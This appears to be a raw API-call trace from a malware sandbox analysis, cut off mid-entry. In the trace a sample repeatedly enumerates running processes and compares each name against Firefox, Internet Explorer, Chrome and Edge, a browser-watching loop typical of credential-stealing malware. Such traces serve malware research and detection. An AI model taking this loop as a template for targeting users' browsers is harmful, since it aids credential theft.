1 [0254.699] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0254.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0254.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0254.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0254.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0254.700] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0254.700] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0254.700] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0254.700] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0254.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0254.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0254.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0254.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0254.701] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0254.701] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0254.701] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0254.701] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.701] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0254.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0254.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0254.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0254.702] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0254.702] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0254.702] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0254.702] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0254.702] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0254.703] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0254.703] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0254.703] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0254.703] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0254.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0254.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0254.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0254.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0254.704] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0254.704] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0254.704] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0254.704] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0254.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0254.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0254.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0254.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0254.705] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0254.705] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0254.705] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0254.705] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.705] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0254.705] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0254.705] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0254.706] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0254.706] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0254.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0254.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0254.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.707] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.707] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.707] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.707] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0254.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0254.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0254.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.708] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.708] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.708] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.708] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.708] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0254.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0254.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0254.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.708] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.709] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.709] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.709] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.709] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.709] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0254.709] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0254.710] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0254.710] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.710] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.710] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.710] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.710] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.711] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.711] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.711] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.711] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.711] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.736] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.736] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.736] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0254.737] CloseHandle (hObject=0xd4) returned 1 [0254.737] Sleep (dwMilliseconds=0x3e8) [0255.739] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0255.741] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.741] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0255.742] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0255.742] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0255.742] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0255.742] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.742] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0255.742] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0255.742] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0255.742] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0255.742] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.743] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0255.743] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0255.743] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0255.743] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.743] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.743] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0255.743] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0255.743] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0255.743] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.743] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.744] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0255.744] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0255.744] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0255.744] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.744] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.744] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0255.744] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0255.744] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0255.744] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.744] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.745] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0255.745] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0255.745] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0255.745] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.745] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.745] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0255.745] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0255.745] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0255.746] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.746] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.746] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0255.746] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0255.746] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0255.746] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.746] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0255.747] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0255.747] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0255.747] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0255.747] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.747] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.747] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.747] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.747] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.747] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.747] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.748] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.748] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.748] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.749] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.749] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.749] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.750] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0255.750] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0255.750] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0255.750] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.750] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.750] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.750] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.750] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.751] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.751] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | 